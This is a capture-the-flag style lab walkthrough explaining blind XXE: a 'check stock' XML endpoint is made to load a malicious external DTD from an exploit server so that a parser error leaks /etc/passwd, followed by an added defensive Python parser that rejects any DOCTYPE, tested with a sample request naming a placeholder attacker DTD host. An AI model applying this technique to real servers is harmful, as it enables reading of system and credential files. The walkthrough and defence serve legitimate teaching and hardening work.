Exploiting blind XXE to retrieve data via error messages
The lab has a "check stock" feature that parses XML input. Send that request to Repeater.
To exploit this, we trigger an XML parsing error whose error message contains the sensitive data, here the contents of /etc/passwd.
In the lab we have an exploit server, which allows us to host a malicious external DTD. You can trigger an XML parsing error message containing the contents of the /etc/passwd file using a malicious external DTD as follows:
This DTD carries out the following steps:
1. Define an XML parameter entity called file, containing the contents of the /etc/passwd file.
2. Define an XML parameter entity called eval, containing a dynamic declaration of another XML parameter entity called error. The error entity will be evaluated by loading a nonexistent file whose name contains the value of the file entity.
3. Use the eval entity, which causes the dynamic declaration of the error entity to be performed.
4. Use the error entity, so that its value is evaluated by attempting to load the nonexistent file, resulting in an error message containing the name of the nonexistent file, which is the contents of the /etc/passwd file.
Now click "View exploit" and copy the URL, which we will use to invoke the DTD.
Next, to make the target server invoke our malicious external DTD, we send the following XXE payload:
which will:
Define an XML parameter entity called xxe, which fetches our exploit server's malicious DTD and interprets it inline.
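Both halves of this attack depend on one thing: the "check stock" endpoint accepting a DOCTYPE, because that is the only place the xxe parameter entity (and the external DTD it pulls in) can be declared. The defensive counterpart is a parser that refuses any DTD before it is processed. The example below is added here and is not code from the lab or from the author of this walkthrough; it uses Python's standard-library expat binding, and the element names stockCheck, productId and storeId, as well as the two sample requests, are constructed assumptions for illustration.

```python
import xml.parsers.expat
from xml.parsers.expat import ExpatError, XML_PARAM_ENTITY_PARSING_NEVER


class DoctypeRejected(ValueError):
    """Raised when untrusted XML carries a DOCTYPE. A DTD is the only place a
    parameter entity such as %xxe; or an external DTD reference can appear."""


def parse_stock_check(data: bytes) -> dict:
    """Parse a stock-check document into {tag: text}, refusing any DTD.

    Assumed document shape (not taken from the lab): <stockCheck> with
    <productId> and <storeId> children.
    """
    fields = {}
    open_tags = []
    parser = xml.parsers.expat.ParserCreate()

    # 1. Reject the document as soon as a DOCTYPE starts. expat calls this
    #    handler before it would ever look at the external subset, so the
    #    attacker-hosted DTD is never fetched.
    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise DoctypeRejected(
            f"DOCTYPE {name!r} not allowed (system id={sysid!r})")

    parser.StartDoctypeDeclHandler = on_doctype

    # 2. Belt and braces: never expand parameter entities, and abort parsing
    #    if expat is ever asked to resolve an external entity reference.
    parser.SetParamEntityParsing(XML_PARAM_ENTITY_PARSING_NEVER)

    def on_external_entity(context, base, sysid, pubid):
        return 0  # a false return makes expat stop with an ExpatError

    parser.ExternalEntityRefHandler = on_external_entity

    # Minimal content handlers for the fields the feature actually needs.
    def on_start(tag, attrs):
        open_tags.append(tag)

    def on_end(tag):
        open_tags.pop()

    def on_chardata(text):
        if open_tags:
            fields[open_tags[-1]] = fields.get(open_tags[-1], "") + text

    parser.StartElementHandler = on_start
    parser.EndElementHandler = on_end
    parser.CharacterDataHandler = on_chardata

    parser.Parse(data, True)
    return {k: v.strip() for k, v in fields.items() if v.strip()}


def safe_parse(data: bytes):
    """Return ("ok", fields) or ("rejected", reason) for an untrusted request."""
    try:
        return "ok", parse_stock_check(data)
    except (DoctypeRejected, ExpatError) as exc:
        return "rejected", str(exc)


# Constructed sample requests (not captured from the lab).
GOOD_REQUEST = (
    b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)
# Same request, but carrying an external DTD reference of the kind the
# walkthrough describes; the host name is a placeholder.
DTD_REQUEST = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE stockCheck SYSTEM "http://exploit-server.invalid/x.dtd">'
    b"<stockCheck><productId>1</productId><storeId>1</storeId></stockCheck>"
)

if __name__ == "__main__":
    print(safe_parse(GOOD_REQUEST))   # ('ok', {'productId': '1', 'storeId': '1'})
    print(safe_parse(DTD_REQUEST))    # ('rejected', "DOCTYPE 'stockCheck' not allowed ...")
```

The check is deliberately coarse: it refuses even harmless DTDs, which is fine for a feature whose input format never needs one. A fresh parser is created per request so that a rejected document cannot leave state behind for the next one.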
Now go to the "check stock" request that we sent to Repeater and submit this XML payload to invoke the malicious DTD hosted on our exploit server.
And we have solved the lab.
Hope you found this walkthrough easy to understand and follow.
Greetings from Sayonara